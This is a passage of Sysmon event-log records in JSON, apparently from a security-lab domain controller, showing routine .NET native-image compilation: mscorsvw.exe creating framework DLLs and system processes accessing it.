{"EventTime":"2020-08-01 05:57:14","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":6364,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:57:14.056\r\nProcessGuid: {A837DB8D-0439-5F25-0000-0010A9C60B00}\r\nProcessId: 1260\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\4ec-0\\System.ServiceProcess.dll\r\nCreationUtcTime: 2020-08-01 05:57:14.056","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:57:14.056","ProcessGuid":"{A837DB8D-0439-5F25-0000-0010A9C60B00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\4ec-0\\System.ServiceProcess.dll","CreationUtcTime":"2020-08-01 05:57:14.056","EventReceivedTime":"2020-08-01 05:57:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:14","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6365,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:14.087\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-043A-5F25-0000-001063CA0B00}\r\nTargetProcessId: 4300\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:14.087","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-043A-5F25-0000-001063CA0B00}","TargetProcessId":"4300","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:14","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6366,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:14.087\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-043A-5F25-0000-001063CA0B00}\r\nTargetProcessId: 4300\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:14.087","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-043A-5F25-0000-001063CA0B00}","TargetProcessId":"4300","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:57:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:14","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6367,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:14.103\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-043A-5F25-0000-001063CA0B00}\r\nTargetProcessId: 4300\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:14.103","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-043A-5F25-0000-001063CA0B00}","TargetProcessId":"4300","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:14","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6368,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:14.181\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-043A-5F25-0000-0010CCCD0B00}\r\nTargetProcessId: 1064\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:14.181","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-043A-5F25-0000-0010CCCD0B00}","TargetProcessId":"1064","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:14","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6369,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:14.181\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-043A-5F25-0000-0010CCCD0B00}\r\nTargetProcessId: 1064\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:14.181","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-043A-5F25-0000-0010CCCD0B00}","TargetProcessId":"1064","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:57:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:14","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6370,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:14.196\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-043A-5F25-0000-0010CCCD0B00}\r\nTargetProcessId: 1064\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:14.196","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-043A-5F25-0000-0010CCCD0B00}","TargetProcessId":"1064","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:15","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":6371,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:57:15.071\r\nProcessGuid: {A837DB8D-043A-5F25-0000-0010CCCD0B00}\r\nProcessId: 1064\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\428-0\\System.Management.dll\r\nCreationUtcTime: 2020-08-01 05:57:15.071","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:57:15.071","ProcessGuid":"{A837DB8D-043A-5F25-0000-0010CCCD0B00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\428-0\\System.Management.dll","CreationUtcTime":"2020-08-01 05:57:15.071","EventReceivedTime":"2020-08-01 05:57:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:15","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6372,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:15.118\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-043B-5F25-0000-0010AED10B00}\r\nTargetProcessId: 4924\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:15.118","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-043B-5F25-0000-0010AED10B00}","TargetProcessId":"4924","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET